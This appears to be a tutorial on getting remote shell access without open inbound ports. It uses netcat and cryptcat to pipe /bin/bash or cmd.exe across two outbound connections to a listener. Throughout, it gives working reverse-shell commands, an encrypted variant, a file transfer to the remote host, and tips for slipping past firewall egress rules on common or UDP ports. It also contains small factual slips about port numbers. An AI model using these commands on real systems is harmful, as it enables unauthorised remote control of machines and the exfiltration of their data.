The goal of this article is to remote control (shell access) a Windows/Linux/whateveros box without any open incoming ports on the target side (target side is where we control the shell).
We need 1 addition tool called Netcat. The Windows version can be found here: http://joncraton.org/files/nc111nt.zip/
[v1.11 NT www.vulnwatch.org/netcat/]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
-d detach from console, background mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
IP’s used in both examples:
Windows box: 192.168.12.138 (Note: netcat binary is called nc.exe!)
Linux box: 192.168.12.141 (Note: netcat binary is called netcat!)
EXAMPLE 1 (CONTROL LINUX):
In this example, we want be able to control our Linux box via a Windows workstation. the trick is, the Linux box (which we will control) doesn’t need any open incoming ports on a firewall.
On the Windows box, we start 2 listening netcat sessions:
#1: >nc -vv -l -p 80
#2: >nc -vv -l -p 25
#1 will be used for sending inputs
#2 will be used for receiving the output
We choose 2 common ports (80=https, 25=smtp) which are often allowed as outgoing ports.
Next we invoke a command, which pipe the bash to the target port 25 (output) and we use port 80 for our commands:
linuxBox:~# netcat 192.168.12.138 80|/bin/bash|netcat 192.168.12.138 25
You can now use 2 Windows shells to control the Linux box.
EXAMPLE 2 (CONTROL WINDOWS):
To explain those pipe commands better, we use now our Linux box to control the Windows box as an example.
On the Linux box start 2 listening netcat sessions (the same as above)
linuxBox:~# netcat -vv -l -p 25
linuxBox:~# netcat -vv -l -p 80
ATTENTION! Be sure those ports are not used by system daemons (web and mail servers). if so, stop the services or choose different ports!
Now we start netcat with a piped cmd.exe like this
> nc 192.168.12.141 80|cmd.exe
The result is, we get a Windows cmd shell on the Linux box (port 80), but the output is no visible on the Linux box, it is still on the Windows shell.
So we need to route the output to the Linux box on port 25:
>nc 192.168.12.141 80|cmd.exe|nc 192.168.12.141 25
If you are short with allowed outgoing ports, you can use UDP instead of TCP (use the -u parameter for netcat, example: linuxBox:~# netcat -vv -l -p 80 -u). Perhaps UDP Port 51 is open (DNS)..
You can also use netcat to transfer files… how? We transfer a file from the Windows box to the Linux box. Use the -w switch (timeout for connects and final net reads) for this!
Save the file as /receve:
linuxBox:~# netcat -vv -l -p 26 -w 30> /receve
And on the client side we send the file evre.ini:
> nc -vv 192.168.12.141 26 -w 2 < evre.ini
Looks like this:
C:_dataneophobfilesexternal>nc -vv 192.168.12.141 25 -w 2 < evre.ini
sent 1058, rcvd 0: NOTSOCK
linuxBox:~# netcat -vv -l -p 25 -w 30 > /receve</span>
listening on [any] 25 ...
connect to [192.168.12.141] from windowsBox [192.168.12.138] 3212
sent 0, rcvd 1058
ADD SOME ENCRYPTION
If you need to encrypt the data, you can use cryptcat, which can be found here: http://farm9.org/Cryptcat/
There is a Windows and a Linux version available. The Windows version (which can only be downloaded as source) contains a typo in the source (doexec.c: replace RecvBuffer with Buffer), a binary version can be downloaded in the tools section.
Cryptcat is actually a netcat with an extra -k option (which defines the shared secret). Here is example 1 with cryptcat:
On the Windows box, we start 2 listening cryptcat sessions (with shared secret test):
#1: >cryptcat -vv -l -p 80 -k test
#2: >cryptcat -vv -l -p 25 -k test
Pipe the stuff on the Linux box:
linuxBox:/# sleep 10000 | cryptcat 192.168.12.138 80 -k test| /bin/bash | cryptcat 192.168.12.138 25 -k test
** Note here, we don’t use telnet anymore (as its unencrypted), we use cryptcat here. **
Example 2 inputs would look like this:
linuxBox:~# cryptcat -vv -l -p 25 -k test
linuxBox:~# cryptcat -vv -l -p 80 -k test
Connect Windows box:
>cryptcat 192.168.12.141 80 -k test|cmd.exe|cryptcat 192.168.12.141 25 -k test